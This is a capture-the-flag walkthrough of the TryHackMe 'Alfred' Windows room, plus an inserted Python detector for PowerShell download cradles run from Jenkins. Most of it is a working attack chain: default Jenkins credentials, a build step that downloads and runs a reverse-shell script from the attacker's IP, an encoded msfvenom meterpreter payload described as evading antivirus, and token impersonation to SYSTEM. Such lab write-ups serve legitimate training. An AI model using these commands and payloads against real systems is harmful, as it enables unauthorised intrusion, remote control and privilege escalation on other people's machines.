【THM】Alfred-Practice

Initial Access

```shell
nmap -p- -sC -sV -T4 10.10.206.74
```

```
Nmap scan report for 10.10.206.74
Host is up (0.19s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2024-01-14T08:53:16
|_Not valid after: 2024-07-15T08:53:16
|_ssl-date: 2024-01-15T09:03:29+00:00; -2s from scanner time.
| rdp-ntlm-info:
| Target_Name: ALFRED
| NetBIOS_Domain_Name: ALFRED
| NetBIOS_Computer_Name: ALFRED
| DNS_Domain_Name: alfred
| DNS_Computer_Name: alfred
| Product_Version: 6.1.7601
|_ System_Time: 2024-01-15T09:03:25+00:00
8080/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```


http://10.10.206.74:8080/

The username is admin and the password is admin.


The version number is visible: Jenkins ver. 2.190.1.


Click project, then click configure.


Fill in:

```powershell
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.63.201:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.63.201 -Port 9001
```

apply and save


Success.
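From the defender's side, the build step above leaves a recognisable trace: the Jenkins java.exe process spawns a shell whose command line downloads and executes remote code. The following is an added detection example, not code from the write-up or from Jenkins; it runs over constructed process-creation records (Sysmon Event ID 1-style fields, simplified, with assumed field names, file paths and account names) and scores exactly that pattern, using the command line entered into the build step as one of the samples.

```python
"""Flag PowerShell download cradles launched from a Jenkins build step.

Added detection example, not part of the original write-up. It runs over
constructed process-creation records (Sysmon Event ID 1-style fields,
simplified; field names, paths and account names are assumptions) and scores
the pattern used above: a shell descended from the Jenkins java.exe process
whose command line downloads and executes remote code.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str          # full path of the newly created process
    ancestry: tuple     # parent, grandparent, ... image paths (nearest first)
    command_line: str
    user: str


# Command-line fragments typical of a download-and-execute cradle.
CRADLE_PATTERNS = {
    "DownloadString": re.compile(r"downloadstring\s*\(", re.I),
    "DownloadFile": re.compile(r"downloadfile\s*\(", re.I),
    "IEX": re.compile(r"\biex\b|invoke-expression", re.I),
    "reverse-shell args": re.compile(r"-reverse\b.*-ipaddress\b", re.I),
}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
BUILD_SERVER = {"java.exe", "jenkins.exe"}


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score(event):
    """Return (severity, reasons); severity is 'none', 'medium' or 'high'."""
    hits = [name for name, rx in CRADLE_PATTERNS.items()
            if rx.search(event.command_line)]
    if not hits:
        # A plain shell under Jenkins is ordinary build activity: no alert on its own.
        return "none", []
    reasons = ["download cradle: " + ", ".join(hits)]
    from_jenkins = basename(event.image) in SHELLS and any(
        basename(a) in BUILD_SERVER for a in event.ancestry)
    if from_jenkins:
        reasons.append("shell descends from Jenkins, running as " + event.user)
        return "high", reasons
    return "medium", reasons


def detect(events):
    """Return [(image, severity, reasons)] for every event scoring above 'none'."""
    findings = []
    for e in events:
        sev, why = score(e)
        if sev != "none":
            findings.append((e.image, sev, why))
    return findings


# Constructed sample events (not telemetry from the box); the cradle command
# line is the one entered into the Jenkins build step above.
JENKINS_JAVA = r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(CMD, (JENKINS_JAVA,), r"cmd /c call C:\Windows\TEMP\build.bat",
                 r"ALFRED\svc_jenkins"),
    ProcessEvent(PS, (CMD, JENKINS_JAVA),
                 "powershell iex (New-Object Net.WebClient).DownloadString("
                 "'http://10.11.63.201:8000/Invoke-PowerShellTcp.ps1');"
                 "Invoke-PowerShellTcp -Reverse -IPAddress 10.11.63.201 -Port 9001",
                 r"ALFRED\svc_jenkins"),
    ProcessEvent(PS, (r"C:\Windows\explorer.exe",), "powershell -Command Get-Process",
                 r"ALFRED\user1"),
    ProcessEvent(PS, (r"C:\Windows\explorer.exe",),
                 "powershell -c (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')",
                 r"ALFRED\user1"),
]

if __name__ == "__main__":
    for image, sev, why in detect(SAMPLE_EVENTS):
        print(sev.upper(), basename(image), "|", "; ".join(why))
```

The first sample (a batch step under Jenkins with no cradle) is deliberately not alerted on, because build servers spawn cmd.exe constantly; the score only rises to high when a cradle and Jenkins ancestry coincide, which is the combination this room's initial access produces.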

Switching Shells

To simplify privilege escalation, let's switch to a meterpreter shell using the following process.

```shell
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.63.201 LPORT=9001 -f exe -o shell-name.exe
```

This payload generates an encoded x86-64 reverse TCP meterpreter payload. Payloads are usually encoded to ensure that they are transmitted correctly and also to evade anti-virus products. An anti-virus product may not recognise the payload and won’t flag it as malicious.

After creating this payload, download it to the machine using the same method as in the previous step.

```powershell
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.63.201:8000/shell-name.exe','shell-name.exe')"
```

Before running it, make sure a handler is set up in Metasploit.

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.63.201
set LPORT 9001
run
```

```powershell
Start-Process "shell-name.exe"
```

Privilege Escalation

Now that we have initial access, let's use token impersonation to gain SYSTEM access.

Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when the user logs in or authenticates. This is usually done by LSASS.exe (think of this as the authentication process).

This access token consists of:

  • User SIDs (security identifiers)
  • Group SIDs
  • Privileges

Amongst other things. More detailed information can be found here.

There are two types of access tokens:

  • Primary access tokens: those associated with a user account that are generated on log on
  • Impersonation tokens: these allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process

For an impersonation token, there are different levels:

  • SecurityAnonymous: current user/client cannot impersonate another user/client
  • SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client
  • SecurityImpersonation: current user/client can impersonate the client’s security context on the local system
  • SecurityDelegation: current user/client can impersonate the client’s security context on a remote system

Where the security context is a data structure that contains users’ relevant security information.

The privileges of an account (which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges:

  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

There’s more reading here.

Use whoami /priv to view all privileges.

```
C:\Program Files (x86)\Jenkins\workspace\project>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
```

We can see the privileges information. The “Enabled” state is the important detail for us.

You can see that two privileges (SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let's use the incognito module that will allow us to exploit this vulnerability.

Enter: load incognito to load the incognito module in Metasploit. Please note that you may need to use the use incognito command if the previous command doesn’t work. Also, ensure that your Metasploit is up to date.

```
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter >
```

To check which tokens are available, enter list_tokens -g. We can see that the BUILTIN\Administrators token is available.

```
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT SERVICE\AudioEndpointBuilder
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\PcaSvc
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\Winmgmt
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
No tokens available
```

Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators’ token. What is the output when you run the getuid command?

```
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter >
```

Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).


Ensure that you migrate to a process with the correct permissions (the above question's answer). The safest process to pick is the services.exe process. First, use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS.


```
meterpreter > migrate 668
[*] Migrating from 2348 to 668...
[*] Migration completed successfully.
meterpreter >
```

```
meterpreter > search -f root.txt
getuid
Found 1 result...
=================

Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Windows\System32\config\root.txt 70 2019-10-26 07:36:00 -0400
meterpreter > cat "c:\Windows\System32\config\root.txt"
��dff0f748678f280250f25a45b8046b4a
```